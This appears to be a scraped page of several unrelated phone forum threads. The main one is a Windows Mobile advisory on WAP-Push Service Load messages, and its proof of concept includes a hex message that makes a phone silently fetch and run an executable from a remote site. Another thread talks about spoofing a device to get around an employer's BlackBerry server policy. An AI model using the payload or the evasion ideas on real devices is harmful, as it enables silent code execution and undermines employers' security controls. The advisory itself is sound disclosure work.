Database Info

BlackBerry Connect OTA enterprise activation backup, passwords etc.

QUESTION 1
I've been flashing and reflashing ROMs for a couple of weeks now and am very impressed with Dutty's latest endeavor. In anticipation of the v4 release, I'm hoping someone in the community can tell me if it is possible to backup an over-the-air (OTA) enterprise activation of BB Connect. Currently I'm calling our technical support guys who, sooner than later I'm sure, will start asking why I have to have to get a new OTA activation password (which they change as soon as you use it) every 5-7 days.
So, in short: moving from one ROM to the next and want to back up OTA BBConnect enterprise activation. Possible? If so, how?
QUESTION 2
Any BES administrators out there willing to tell me if my Tilt/Kaiser shows up on the BES (v4) differently than a BlackBerry (like the POS 7280 I'm given by the company). If so, is there a way to "spoof" that since my company will not allow non-blackberry devices.
QUESTION 3
When using the stock AT&T ROM, my Tilt respects the (highly restrictive, Bluetooth disabling, password-enforcing, ridiculous) IT Policy pushed by the BES administrator. When I flashed to Dutty's DualTouch ROM v3 Final, this no longer happened. Now, it just reads "default" for the IT Policy. Is this a fluke or some wonderful reg entry that we need to identify and protect like diamonds?
Thanks, all.
Cheers,
Your Local Village Idiot

VillageIdiot said:
QUESTION 2
Any BES administrators out there willing to tell me if my Tilt/Kaiser shows up on the BES (v4) differently than a BlackBerry (like the POS 7280 I'm given by the company). If so, is there a way to "spoof" that since my company will not allow non-blackberry devices.
Click to expand...
Click to collapse
We run BES here and indeed non-blackberry devices are reported as the phone model when you look up the phones information.
This could probably easily be spoofed to whatever you like. If you hacked the blackberry connect application, or intercepted and modified the data passed over to BES. You could make it say anything you want at that point.
I'd get "in" with your IT guys and that way they can pull a favor for you now and then with the BES server. Other then that, have the company pay for a blackberry phone and carry two phones around, or refuse to carry a company phone and don't use your personal phone for company resources. If they're blocking your productivity by a poorly guided company policy, make it cost them money. Don't inconvenience yourself to keep your productivity as an employee on par.
Really though, it's not feasible to secretly go behind your employers back with your tilt. I think it's ridiculous a company wouldn't let you use your Tilt -- though probably because the corporation is uneducated or ignorant to the fact that the Tilt can be locked down just as well as a blackberry phone. Too bad the employer has a bunch of pointy haired management types running around who don't know what they're doing and out of ignorance banned non-BB devices.

Jon,
Thank you for your prompt reply and clarification on what shows up at the BES. Hacking the BB connect app is beyond my current knowledge set, but I may look into it if I'm unable to find a simpler solution.
Unfortunately, my company has several thousand employees so my productivity concerns are far outweighed by their misinformed security concerns. I've pitched the benefits of BB connect, WM5/6 devices and direct-push Exchange sync, but my pitch falls on deaf ears. They have provided me a BB 7280 and some get newer 8XXX devices, but beyond that we're expected to be happy with what we have. I'm even buying a non-camera Tilt to replace my two week old Tilt because they won't allow personal camera phones (all BB connect issues aside). You'd think I work for MI-6...
Cheers,
T.V.I.

VillageIdiot said:
QUESTION 1
I've been flashing and reflashing ROMs for a couple of weeks now and am very impressed with Dutty's latest endeavor. In anticipation of the v4 release, I'm hoping someone in the community can tell me if it is possible to backup an over-the-air (OTA) enterprise activation of BB Connect. Currently I'm calling our technical support guys who, sooner than later I'm sure, will start asking why I have to have to get a new OTA activation password (which they change as soon as you use it) every 5-7 days.
im soooo it this situation, any ideas?
Click to expand...
Click to collapse

Here's how you do it
you could use the desktop software instead of OTA. this will activate the phone without requiring you to get a new activation code.
Here's how I back up and restore. This has worked often, and not worked a few times.
Try to follow this exactly for best results.
get task manager v2.7 from fdcsoft
tap the blackberry icon on the taskbar and suspend the service under status
start taskmanager, and go to services. stop the two blackberry services, log and security.
open file explorer, and copy the directory RIM in /application data to your storage card
flash your phone with whatever-
copy the RIM folder back to /application data from your storage card
load blackberry connect (this should be the same version you had, otherwise you may have issues)
tap the blackberry icon in settings-system
instead of installing, you should see a window that says "repairing settings"
your old password should be restored, and the phone will lock and ask you to unlock. use your password you had before the backup.
all of your folders and mail should be back.
This works about 90% of the time.
some issues I've had-
multiple blackberry folders- one with emails, one with nothing.
folders missing, a bunch of email in drafts folder.
older messages no longer sync with desktop
good luck!

[Security Advisory] Manufacturers leave device open for WAP-Push based attacks

Windows Mobile Security Advisory: Manufacturers leave device open for WAP-Push based attacks
--------------------------------------------------------------------------------------------
Description:
------------
WAP Push SI (Service Indication) and SL (Service Load) are so called "Service SMS". These messages are used by operators to notify about software updates or to deploy them directly. Microsoft implemented a security policy to ensure that these messages are accepted only from trusted orginators. This policy is defined in the device registry. If improper settings are applied to this policy attackers can send malicious content to the device which then displays or executes the content immediately. This leaves the device open for further attack scenarios.
Workaround / Fixes:
-------------------
Open your device registry and navigate to:
HKLM\Security\Policies\Policies
Check the values of the following DWORDs:
0x0000100c
and
0x0000100d
Microsofts recommends the following values for these:
0x0000100c : 0x800
0x0000100d : 0xc00
If they are for example 0x840 and 0xc40 your device is wide open and vulnerable. Change the keys to
the Microsoft recommendation. They are effective immediately.
Proof of concept:
-----------------
For testing purposes check the above registry keys and set them to a faulty value (like the above
0x840 and 0xc40). Then use a program like PDUSpy or HushSMS to do some testings.
HushSMS is able to send these kind of messages from windows mobile based devices.
Get HushSMS from http://www.silentservices.de/HushSMS.html
Download the latest version (currently v0.6beta) and install it on your device.
Execute HushSMS and type in the number of the receipient windows mobile phone.
In the message body field type in the following (note without a leading HTTP://!!!):
www.silentservices.de/wapsltest.exe
Click Send->Send WAPSL
Watch your target device. If it starts connecting via GPRS it will then download the above sample
program and executes it immediatly without user interaction.
If you want to test your target device with PDUSpy use the follwing sample message:
UDH: 05040b8423f0
Message(hex):
DC0605B0AF82B48302066A008509037777772e73696c656e7473657276696365732e64652f77617074657374736c2e65786
5000501
Edit: Added a youtube video in post #4
EDIT 19.09.2008: Some clarifications
Well, I received my brand new raphael two weeks ago and guess what, the values set by HTC by default are even more worse.
They set 4108 (0x100c) to 0x840
and set 4109 (0x100d) to 0x40
These means in detail:
Accept WAP Push Service Load Messages orgination from authenticated and trusted PPGs (Push Proxy Getways) AND any.
Accept WAP Push Service Indication Messages origination from any.
Hell, I informed HTC a long while ago about these issues, I wrote them several mails but all I got was some standard response like "Thank you, we will look into it".
However some may say:"Hey that's not that worse, I have opera set as my default browser and opera asks me each time what I want to do with this automagically downloaded file, so I'm safe as I always click on drop or simply close my opera window."
Well, since this is fine for people who "know what they are doing", but is is not for or these other people around there taht are using these devices and even don't have clue about what WAP Push is or what a security policy is or simply don't mind on clicking "accept" each time a message pops up ( and trust me when I say there are more people like this out there as you may guess).
Imagine the following scenario:
A malicious freak sets up a domain which is called www.htcupdateservice.com and hosts dangerous files on that domain. Now he sends out WAP Push SL messages to normal users of Windows Mobile phones with these faulty settings with the text:"HTC has to inform you about a critical security update. Donwload ist at http://www.htcupdateservice.com/Update3.6.9.exe"
What do you guess what enough people out there will do? Do you really think that most people that are not trained about security won't click on execute or download in their opera browser?
And what about people that dont have opera set as their default browser? You guessed right, the file will be downloaded and executed without user interaction. BOOM...
Here's another scenario:
Imagine a security vunlerability in opera mobile is discovered that can be exploited if the user visits a malicious webpages. You can guess how someone can force the user to visit this infectious webpage, can't you? ;-)
Or, let's say a malicious freak on the net sets up a webpages that utilizes CSRF attacks, or XSS, or whatever web based attack you may know. Using WAP Push SL messages he can force your browser to become the attacker and the victim with only one message.
It's up to you to care about this or not since HTC doesn't seem to care.
Cheers

This is good info, though I don't see it as a huge hole since there is still opportunity to block the file by the end-user...which ultimately is required in both settings scenarios to stop the file executing.
From where are you getting these alerts, MSDN? I'd like to get in on receiving them.

tmknight said:
This is good info, though I don't see it as a huge hole since there is still opportunity to block the file by the end-user...which ultimately is required in both settings scenarios to stop the file executing.
From where are you getting these alerts, MSDN? I'd like to get in on receiving them.
Click to expand...
Click to collapse
For SI you are right since the user only gets notified with an URL, but I would call it a huge whole for the SL things. SL messages get executed by the device immediately without the user having a way to block or stop this (if the message is set up accordingly; there are 3 message options as per standard and I refer to the silent execution flag).
If you are watching your device while the messages comes in you can see that a gprs connection is beeing made (if you are connected the whole time with an unlimited data plan for example you wouldnt even notice this).
Just give it try with the method I posted in the advisory with HushSMS (not advertising my program here, just giving a proof of concept).
Both advisories are made by me since I dicovered both flaws.
Cheers

I just made a youtube video to demonstrate what this vulnerability means.
Watch it here: http://de.youtube.com/watch?v=QhJ5SgD-bdQ

I did try it before I posted and my results in each instance (default and with suggested fix) incurred a user prompt. Albeit the default setting did not prompt for the executable to run, but still was prompted to download via IE - recommeded setting prompts at download and execution (see signature for my setup).
Like I said it is good info and indeed a security risk.
Will you share from where this info came?
Cheers

tmknight said:
I did try it before I posted and my results in each instance (default and with suggested fix) incurred a user prompt. Albeit the default setting did not prompt for the executable to run, but still was prompted to download via IE - recommeded setting prompts at download and execution (see signature for my setup).
Like I said it is good info and indeed a security risk.
Click to expand...
Click to collapse
Well this is interesting. So you say you had the same faulty registry keys like the new kaiser wm 6.1 rom had? (100c and 100d set to 840 and c40)
As you may have seen in the video my IE simply did not ask to open the file. It just gets executed...
Well, then at least your IE settings saved you from getting r00ted
tmknight said:
Will you share from where this info came?
Click to expand...
Click to collapse
This vulnerability was researched by me about 1 year ago. But the default settings for SL and SI messages was always set correct in the last ROM versions for the devices I had. I just looked at the default settings on this new kaiser rom and found that they left it open for whatever reason and so I published this advisory. I already contacted HTC and am waiting for a response.

hi, i've got htc raphael and values are
0x0000100c : 0x800
0x0000100d : 0x40
not
0x0000100c : 0x800
0x0000100d : 0xc00
but still flaw works. luckly i have opera as default browser but i wanted to findout how can achive download only option.
also by changing to those suggested values do i disable my phones wappush message receive capability?
thanks

Hello,
Good day, I would like to thank you for this post about Wap Push Messages. I have a straing problem with my HTC Kaiser Windows Mobil 6.1. My device don't notify me about any WAP Push Messages. I have the 800 & c00 vales in my registry, I changed them to 840 & c40 and send a test message as you suggest and it's started downloading after a period of time without asking me.
I changed it back to Microsoft recommends and send a new message again but it didn't appear in inbox message and my cell didn't notify me about new WAP PUSH message.
I'm going crazy with this, what's the problem, can you help me ?
Regards,

Desigen said:
... I changed them to 840 & c40 and send a test message as you suggest and it's started downloading after a period of time without asking me.
I changed it back to Microsoft recommends and send a new messeage again but it didn't appear in inbox message and my cell didn't notifcate me about new WAP PUSH message.
...
Click to expand...
Click to collapse
I don't understand what exactly your promblem is with. If you set the Microsoft recommended values it simply tell the device which security policy to apply to wich kind of messages. In the case of the two values the settings say that WAP-Push SL & SI messages have to come from trusted push proxy gateways. If you set them to the faulty values (840&c40) the device accepts these kind of messages coming from any. If the correct (or recommended) values are set the device simply drops or discards the messages without any user notification. So your described behaviour looks normal to me.
(Note: for those who are familiar with device roles and policies, I'm not going into deep here to avoid confusion)

Thanks for fast replay,
My problem is that I don't get notification from my mobile about new WAP-Push Messagess. I think when I receive an new one it must be in the inbox. My problem is, WAP-Push Messagess doesn't appear in the SMS/inbox folder.
Thanks

nolovelust said:
hi, i've got htc raphael and values are
0x0000100c : 0x800
0x0000100d : 0x40
not
0x0000100c : 0x800
0x0000100d : 0xc00
but still flaw works. luckly i have opera as default browser but i wanted to findout how can achive download only option.
also by changing to those suggested values do i disable my phones wappush message receive capability?
thanks
Click to expand...
Click to collapse
Well 0x800 for 0x100c is fine but 0x40 for 0x100d is not.
Policy 4108 (0x100c) handles WAP Push Service Load (SL) Messages
Policy 4109 (0x100d) handles WAP Push Service Indication (SI) Messages
So if policy 4109 (0x100d) is set to 40 this means that the device will accept messages from any instead of trusted push proxy gateways only.
So the settings you wrote above mean the following:
4108 (0x100c) = 0x800 : Accept WAP Push Service Load (SL) messages only from trusted and authenticated push proxy gateways
4109 (0x100d) = 0x40 : Accept WAP Push Service Indication messages from any originator and no authentication is needed
While Service Indication messages are not as harmful as Service Load messages, they still can try to fool people into clicking the download now option. Since the orginator is hidden and you only see network message as the sender, this kind of attack can be used to spoof valid operator messages.
I suggest you set 4109 (0x100d) to a value of 0xc40.
These settings do not prevent your device from receiving these kind of messages, but they have to come from an authenticated and trusted push proxy gateway or source.

Desigen said:
Thanks for fast replay,
My problem is that I don't get notification from my mobile about new WAP-Push Messagess. I think when I receive an new one it must be in the inbox. My problem is, WAP-Push Messagess doesn't appear in the SMS/inbox folder.
Thanks
Click to expand...
Click to collapse
Which kind of wap push message are you talking about?

For those that would like to read more about security policies and roles on windows mobile google for:
"Security Model For Windows Mobile 5.0 and Windows Mobile 6"

c0rnholio said:
Which kind of wap push message are you talking about?
Click to expand...
Click to collapse
Dear c0rnholio,
I think it's SL, I talking about the one you receive an option to download the content for Internet. Because my mobile provider send a WAP-Push to download ringtone over GPRS. So, they told me you need to do some modification in your mobile to receive this kind of messages. My mobile don't save the WAP-Push in the inbox folder. But when I put my SIM in Nokia phone I receive those WAP-Push.
As A test. I sent a WAPSL message using HushSMS to my phone it done not do anything. I sent one to Nokia Device it's reading it and give me an option to download the content.
Thansk

Desigen said:
...
As A test. I sent a WAPSL message using HushSMS to my phone it done not do anything. I sent one to Nokia Device it's reading it and give me an option to download the content...
Click to expand...
Click to collapse
Ah, OK, now I got you. Well, if the policy is set right your device will discard the message you sent with HushSMS because it is not coming from a trusted and authenticated source. But you should still be able to receive these messages from your service provider if your device is properly provisioned.
The fact that you can receive them on your nokia just indicates that nokia also has lazy security settings for these kind of messages.
If you cannot receive your ringtone from your provider when the correct policy settings are applied it seems that your device is not provisioned to trust your service provider. I suggest you enable it temporary by setting the unsecure values and after receiption of your ringtones reset them to the secure values.

Some clarifications
Well, I received my brand new raphael two weeks ago and guess what, the values set by HTC by default are even more worse.
They set 4108 (0x100c) to 0x840
and set 4109 (0x100d) to 0x40
These means in detail:
Accept WAP Push Service Load Messages orgination from authenticated and trusted PPGs (Push Proxy Getways) AND any.
Accept WAP Push Service Indication Messages origination from any.
Hell, I informed HTC a long while ago about these issues, I wrote them several mails but all I got was some standard response like "Thank you, we will look into it".
However some may say:"Hey that's not that worse, I have opera set as my default browser and opera asks me each time what I want to do with this automagically downloaded file, so I'm safe as I always click on drop or simply close my opera window."
Well, since this is fine for people who "know what they are doing", but is is not for or these other people around there taht are using these devices and even don't have clue about what WAP Push is or what a security policy is or simply don't mind on clicking "accept" each time a message pops up ( and trust me when I say there are more people like this out there as you may guess).
Imagine the following scenario:
A malicious freak sets up a domain which is called www.htcupdateservice.com and hosts dangerous files on that domain. Now he sends out WAP Push SL messages to normal users of Windows Mobile phones with these faulty settings with the text:"HTC has to inform you about a critical security update. Download it at http://www.htcupdateservice.com/Update3.6.9.exe"
What do you guess what enough people out there will do? Do you really think that most people that are not trained about security won't click on execute or download in their opera browser?
And what about people that dont have opera set as their default browser? You guessed right, the file will be downloaded and executed without user interaction. BOOM...
Here's another scenario:
Imagine a security vunlerability in opera mobile is discovered that can be exploited if the user visits a malicious webpages. You can guess how someone can force the user to visit this infectious webpage, can't you? ;-)
Or, let's say a malicious freak on the net sets up a webpages that utilizes CSRF attacks, or XSS, or whatever web based attack you may know. Using WAP Push SL messages he can force your browser to become the attacker and the victim with only one message.
It's up to you to care about this or not since HTC doesn't seem to care.
Cheers

Hi,
It seems that the value 0x40 for 0x100d working well for me I received notification and the message stored in the inbox, any idea !!
But I don't know who changed the both value to be 0x480 & 0xc00
Something to mention, two weeks ago I received my first WAP-Push but it was sent from unauthorized source !

Desigen said:
Hi,
It seems that the value 0x40 for 0x100d working well for me I received notification and the message stored in the inbox, any idea !!
But I don't know who changed the both value to be 0x480 & 0xc00
Something to mention, two weeks ago I received my first WAP-Push but it was sent from unauthorized source !
Click to expand...
Click to collapse
It seems you misunderstood me, or I'm simply not getting your point here.
Yes, with a value of 0x40 for 0x100d you can receive WAP Push SI messages from anyone. This might become a risk. The secure setting for this policy is 0xc00. This will save you from unwanted SI messages but may block your providers ringtone messages.
The default values you had where set from HTC (or whatever ROM you migth have installed) with the delivery of the ROM that is installed on the device. That's the final point of the advisory. The ROM manufacturer has left the device open for these kind of attacks.
However a final word in our little discussion:
If you want to be able to receive WAP Push messages from an untrusted and unauthenticated source then leave the settings as they were at the beginning. Be warned as this may be a security risk.
If you don't want to receive WAP Push messages from untrusted and unsauthenticated origins, then change the values as described in the first post.
As a rule of thumb: If you want to receive these messages, even if they come from untrusted and unauthenticated sources, but only want this temporary (for example if you know that your provider will send you a ringtone in the next minutes) then set the values to 0x40 each and after you received what you want reset them to the recommended values on the first post.
I'm out...
cheers

Thanks for sharing this usfull information with us.

I don't understand the value '0xc00' -- does that mean just change it to zero's? That's what I did using the registry editor... there were both 'hex' and 'dec' settings, with the 'hex' dword value appearing to be the one that needed fixing -- so I changed 0000100c to 800 and 100d to 0 -- is this right, or have I inadvertently instructed orbiting alien spacecraft to open fire upon earth?
Maybe screenshots, or a little more explanation on exactly what registry changes need to be made, I'm not used to ones with both hex and dec entries...

Seven (push email), Tilt and WM6.1

Anyone here using Seven on their Tilt with the new ATT Rom?
I've been using it for about 2 weeks just fine with no problems whats so ever. Now since flashing my ROM I started having issues.
The two main ones are that messages are not getting marked as read back on the server side and that composed messages are not being sent.
Anyone else here seeing this?
I am running the official ATT WM6.1 ROM.
Thanks
David

texas said:
Anyone here using Seven on their Tilt with the new ATT Rom?
I've been using it for about 2 weeks just fine with no problems whats so ever. Now since flashing my ROM I started having issues.
The two main ones are that messages are not getting marked as read back on the server side and that composed messages are not being sent.
Anyone else here seeing this?
I am running the official ATT WM6.1 ROM.
Thanks
David
Click to expand...
Click to collapse
Might be better re-asking in the Kaiser Software forum and getting the Mods to close this one.
Ta
Dave

reasked in the Kaiser forum, Mod pls close this thread.
Thanks and sorry for the mis-post.
David

I am using Seven on my TyNT II now and it's working fine.
However, I don't know if you all know that when you setup an email account to SEVEN, your phone automatically sends an sms to an England number +447624802625, which will charge you an international sms. This will happen when you add one and every email account. Here is the confirmation from SEVEN:
abackholm - SEVEN's Site Admin said:
First of all, thanks for everyone supporting SEVEN in participating the beta program. Your efforts have continued to help our software reach higher quality and become more reliable. Sincerely, being a non-commercial offering that does not earn SEVEN a dime, we sometimes put you in a difficult spot: the setup is not necessarily optimized for the end user, but rather to maximize feedback and exposure SEVEN gets for various features and setup configurations.
In this case, we want to test the phone number validation using SMS.
(1) In production deployments we need user's phone number (instead of IMSI) to be able to send SMS triggers that wake up the client so that there is no need for always-on data connection - to conserve bandwidth and battery.
(2) In production deployments the SMS would be zero-rated, but that's unfortunately not an option in the beta program as operators are not participating with beta testing in their mind. In such deployments, there is no need for multiple SMS-to-HTTP gateway numbers, and thus our setup only supports using one at a time. As the beta program is global in nature, majority of users will always have to use an international number.
I apologize for inconvenience this causes. I realize that those who need to reinstall the client very frequently are especially vulnerable. However, I'd like to remind that participation in the beta program is entirely voluntary.
Click to expand...
Click to collapse
And luckily some solution has been found:
Hi guys, the problem is over for me as I found a trick for this. There are two ways:
1. I just install and run SEVEN with an OUT-OF-MONEY SIM so that it could not send any international sms. I don't know if you have this in your country or not but here we have 2 different accounts for one SIM, the main account and the promotion account. With the promotion account we can use most of the sms, 3g, gprs, phone services but not international sms/calls and value-added services (like buying ringtones, games etc), and the main account covers those things. So I've tried a SIM without money in the main account and everything goes great though it could not send an international sms. When I put my other SIM in, it does not request me to activate Smile
2. I've tried to install and run SEVEN without a SIM, and turn the wifi on when I add emails. SEVEN requested me to input my phone number and I did it. Then when everything is done I just insert my SIM in, and everything worked fine, no more international sms.
Cheers!!!
Click to expand...
Click to collapse
and
I can add that I have just disabled the phone connnection and connected via wifi when adding an account. This also works.
Click to expand...
Click to collapse
You can find more information from here:
http://community.seven.com/forum/viewtopic.php?t=2749

Official press release *leaked*! Froyo update will be released in Asia-Pacific soon!

http://www.motorola.com/staticfiles...8-1_Milestone_1_Android_2_Release_notes.Final[1]_ZH-TW.pdf
(*Press release in Traditional Chinese only*)
Press release was ready and leaked on official Motorola website
although no release date was found on it
it was told that the update will be available on 25/1

Translate thru Google translation, don't blame for the poor English
Milestone Android 2.2 version of the software upgrade
Introduction
We are honored to launch the new Motorola Milestone users Android ™ 2.2 (Froyo) software upgrade.
Android 2.2 (Froyo) software update includes numerous new features, a lot of shortcuts and enhancements.
Upgrade now to enjoy the best performance.
For more information about Motorola Milestone
Support information, please visit our Web site: www.motorola.com / mymilestone.
You can get more the following site to get more support Milestone: http://www.motorola.com/Support/GBEN/Country-Selector/Milestone.
The object for the content of this release
All users of Motorola Milestone
After downloading and installing Android 2.2 (Froyo) software version, you will enjoy:
Enhancements:
 support for Adobe ® Flash ® Player 10.1, can improve the web browsing, downloads are currently made at the Android Market
 strengthen the browser performance for faster loading web pages contains a lot of JavaScript.
 the new security options, including remote wipe and device lock function, complex password, and set the minimum password length.
 improving 3G performance and connectivity hot action.
 Widget from the home screen of the new tips, shortcuts and assistance to help users navigate more efficiently phone content.
 can be easily used in the eight most recent switch between applications with ease.
 Bluetooth ® voice dialing feature to display your voice instructions and repeat them.
 restrain the touch screen, you can switch the letters, numbers and symbols.
 to improve the Wi-Fi performance and connectivity.
 270 degree rotating screen in any direction using compatible applications.
 by updating the "backup assistant" to manage the contact.
 add video files, easily edit MMS messages.
 Backup and restore functions using Google to retain applications and settings.
Improvement:
 with the UK through a number of complex digital password options to improve security.
 enhanced audio quality.
 can view from Outlook ® 2003, Yahoo! ® and Outlook Express e-mail account to send PDF and Microsoft ®
Office files, and general e-mail account TXT file attachments.
 wireless update, retaining the Home icon in the location.
 have five home screen for easy access to the phone, launch applications and browser shortcuts.
 Microsoft Exchange administrators to manage password policies through all devices.
 your Exchange e-mail account and phone synchronization, and automatically fill in the recipient address.
 increase the volume of ringtones and notification.
 editable object contains a lot of companies invited to regular meetings calendar.  home screen with shortcuts.
 to improve the image management features to manage through Bluetooth to send photos to the Milestone.
 to improve a large number of Hotmail ® e-mail account synchronization.
 simplify Microsoft Exchange Active Sync ® operations, improve efficiency
Android 2.2 intelligently improve the quality of your communication
 Android 2.2 Action to strengthen the ability to significantly shorten the response time.
You can choose from five home screen in any one place, easy to use the phone through the dedicated shortcut, application launcher and browser.
Add digital and alphanumeric password option, and enjoy superior safety.
 Now, Microsoft Exchange administrators to manage password policies through any device, to ensure that company information safe. Android
2.2 Calendar application supports Exchange Calendar is now available. In addition, you can also use the Bluetooth
Voice dialing features hands-free calls, the system will repeat your instructions to ensure accuracy.
How to install upgrade
Update (United States) - http://www.motorola.com/repair
Update (outside the United States) - http://www.motorola.com/update
Upgrade installation support
Click here for Customer Support: www.motorola.com / support, or go to our online community: https: supportforums.mo
torola.com, seek the help of other owners.
Some features, services and applications required with the network, and not be able to use in all regions; may have additional terms and conditions and at an additional cost.
For specific functions and features, Android between the various software versions may be different. Please contact your service provider.
MOTOROLA and the Stylized M logo are Motorola Trademark Holdings, LLC.'s Trademarks or registered trademarks. Bluetooth
Trademark is held by its owners, and by unauthorized use. Google, Android and the Android Market is Google, Inc.
Trademarks. All other product or service names are the property of their respective owners. © 2010 Motorola Mobility, Inc. All rights reserved.

Backup;
http://dl.dropbox.com/u/6711209/Leaked - Official Press - Froyo.pdf

Knowing Moto, i'll believe when i start getting the OTA update on my phone.

hey this is great news. finally motorola takes a call on upgrading milestone at a global level.

sileshn said:
Knowing Moto, i'll believe when i start getting the OTA update on my phone.
Click to expand...
Click to collapse
It's times like these I wish xda had a "like" button.

Ah, so I guess it would be only a matter of time before we get the official one eh? But I really don't think I'd stick to my Milestone any longer. Unless they unlock the bootloader as well, then maybe I won't go to HTC for my next phone.

ive done my best to translate it to english, some are skipped because i think its not important
Enhancements:
 Flash Player 10.1
 Browser loads Javascript faster
 remote wipe and device lock function
 Improved 3G performance and hotspot functionality.
 New widgets?
 8 recent app
 Bluetooth ® voice dialing
 improved Wi-Fi performance and connectivity.
 270 degree rotating screen
 manage contacts by syncing "backup assistant"
 add video files, easily edit MMS messages.
 Google Backup and Restore (saves your wifi password?)
Improvement:
 Enhanced phone security
 Enhanced audio quality.
 Widgets keep in place after OTA
 Five home screen
 Increased volume of ringtones and notification.
 Home screen with shortcuts.
 Improved image management, you can now manage the photo sent to milestone via bluetooth
 Improved synchronization of an Hotmail account contains a lot of emails.
 Simplified Microsoft Exchange Active Sync ® operations, improve efficiency

sileshn said:
Knowing Moto, i'll believe when i start getting the OTA update on my phone.
Click to expand...
Click to collapse
Likewise. I doubt this would be happening within this month. Still trying to remain positive though. I just hope that release would be really GOOD, given the fact that they had delayed the release several times already.

270 degrees rotation is kinda annoying for me while I'm lying down and using the phone.

tisungho said:
270 degrees rotation is kinda annoying for me while I'm lying down and using the phone.
Click to expand...
Click to collapse
You can disable it with many widget/app if you don't like..

I dont think that the update will be relesed in this month at all.

sileshn said:
Knowing Moto, i'll believe when i start getting the OTA update on my phone.
Click to expand...
Click to collapse
DannyDroid said:
It's times like these I wish xda had a "like" button.
Click to expand...
Click to collapse
Very True...

App2SD
exhardy said:
ive done my best to translate it to english, some are skipped because i think its not important
Click to expand...
Click to collapse
How about Froyo's native App2SD support... I don't see its mentioned anywhere (Original Google Translation or Better Transalation)

PDF published in Spain as well
http://tinyurl.com/64et6ba

i fell that moto is in its final stages and gonna launch it in a few days time. (I'm Not Motorola). its just my insticnt.

naresh9876 said:
i fell that moto is in its final stages and gonna launch it in a few days time. (I'm Not Motorola). its just my insticnt.
Click to expand...
Click to collapse
I agree. With such conspiracies and papers coming up everyday, and FroYo being delayed for so long, I think they are in the process of rolling out a FroYo update very soon...
(Fingers Crossed) Dont disappoint us this time, Moto. Or its the last time we put faith in you.

I can just say that Motorola is asking to some Spaniards at facebook (click on Page 5) to check again if we get the update.
Apparently it was supposed to start rolling out for us in Spain yesterday, but as of this moment it's not working

zankyw said:
I can just say that Motorola is asking to some Spaniards at facebook (click on Page 5) to check again if we get the update.
Apparently it was supposed to start rolling out for us in Spain yesterday, but as of this moment it's not working
Click to expand...
Click to collapse
If I'm not wrong the previous updates were pushed on sunday evening, maybe it's a motorola "rule".

The Solutor said:
If I'm not wrong the previous updates were pushed on sunday evening, maybe it's a motorola "rule".
Click to expand...
Click to collapse
Ok guys, I'll be alert tomorrow then.
Is it usual for Moto to release it first in certain countries to test the release?
Assuming that's going to happen, would it be useful for you guys if I do a factory reset after getting the update, and then upload the backup somewhere?

Spains got it!

Software Update version 2.2 for Milestone Android
Introduction
We are pleased to announce the launch of the Android ™ Software Update 2.2 (Froy) for users of Motorola Milestone. The Android software update 2.2 (Froy) includes many new features, shortcuts and improvements. Upgrade your version now and get the best performance.
For more information on Support for Motorola Milestone Motorola, visit www.motorola.com / mymilestone.
You can find additional support for Milestone in http://www.motorola.com/Support/GB-EN/Country-Selector/Milestone.
Users can use this version
ALL users of Motorola Milestone
After downloading and installing the Android software update 2.2 (Froy), enjoy:
Improvements:
•
Improved web browsing with support for Adobe ® Flash ® Player 10.1, currently available for download from Android Market
•
Improving the performance of the browser to load faster JavaScript heavy pages.
•
New security features include remote wipe, device lock, complex passwords and minimum number of characters per password.
•
Improved performance and 3G Mobile Hotspot.
•
New tips, shortcuts and assistance from a widget on the home screen to help users better navigate the phone.
•
Possibility to easily switch between applications used the last eight.
•
Voice dialing via Bluetooth ® shows and repeats his instructions.
•
Switching between letters, numbers and symbols by sliding your finger on the touch screen.
•
Improved performance and Wi-Fi connectivity.
•
Screen rotation 270 degrees to work with applications in any direction.
•
Managing contacts with the backup wizard to date.
•
Easy editing MMS message attachments after video.
•
Protection of applications and settings to the role of backup and restore Google.
Improvements:
•
Improved security options complex numeric and alphanumeric passwords.
•
Improved sound quality.
•
Viewing PDF files and Microsoft ® Office sent from email accounts Outlook ® 2003, Yahoo ® and Outlook Express, and TXT attachments from email accounts.
•
Keep the original locations of the icons on the main screen after the update via your mobile connection.
•
Easy shortcuts to the phone, start the tool and the browser application from any of the five main screens.
•
Management password policies for Microsoft Exchange administrators in all devices.
•
Synchronize your Exchange account and automatically fill in your e-mail addresses of the recipients.
•
Highest level for tones and notifications.
•
Edit Calendar Corporate meetings that are repeated a large number of guests.
•
Home Screen with shortcuts.
•
Improving the management of images to photographs sent to the phone via Bluetooth Milestone.
•
Improved Hotmail ® account synchronization with a large number of messages.
•
Optimized efficiency in Microsoft Exchange Active Sync ®
Improve communication with intelligent functions Android 2.2
•
Android 2.2 mobile organizational power and response time. Specific shortcuts can easily access the phone, start the tool and the browser applications from any of the five main screens. Get enhanced security with password options numeric and alphanumeric.
•
Now Microsoft Exchange administrators can manage the password policies on all devices to ensure the security of company information. Android 2.2 lets you use Exchange calendars in the Calendar application. In addition, use voice dialing via Bluetooth for handsfree phone calls and listen to your instructions to ensure accuracy.
Instructions for installing the update
Instructions on updating (United States) - Instructions on updating http://www.motorola.com/repair (other countries) - http://www.motorola.com/update
Installation Assistance Update
Click here to go to the customer www.motorola.com / support or to receive help from other users in our online community at https: supportforums.motorola.com.
Some services, functions and applications are network dependent and may not be available in all areas, it is possible to apply other terms, conditions and rates. The specific functions and features of each version of Android software may vary. For more information, check with your carrier.
MOTOROLA and the Stylized M logo are trademarks or registered trademarks of Motorola Trademark Holdings, LLC. The Bluetooth trademarks are property of their respective owners and are used under license. Google, Android and Android Market are trademarks of Google Inc. All other product or service names are the property of their respective owners. © 2010 Motorola Mobility, Inc. All rights reserved.
Regards, PK

Is it an OTA update?

confirmed! is there!
lets the development begin!

sileshn said:
Is it an OTA update?
Click to expand...
Click to collapse
It's a downloadable update.
On the right hand side bar (on the Spain site) there is a direct link.
Sent from my Milestone

motorator said:
It's a downloadable update.
On the right hand side bar (on the Spain site) there is a direct link.
Sent from my Milestone
Click to expand...
Click to collapse
Can you post the link here.

sileshn said:
Can you post the link here.
Click to expand...
Click to collapse
My mistake, it was a link to a PDF upgrade guide, not the actual upgrade.
Sent from my Milestone

motorator said:
My mistake, it was a link to a PDF upgrade guide, not the actual upgrade.
Sent from my Milestone
Click to expand...
Click to collapse
That's ok. Flashing 2.1. lets see if i get an OTA update.

sileshn said:
That's ok. Flashing 2.1. lets see if i get an OTA update.
Click to expand...
Click to collapse
i'm without battery could you please confirm if you have it avalible?

boto said:
i'm without battery could you please confirm if you have it avalible?
Click to expand...
Click to collapse
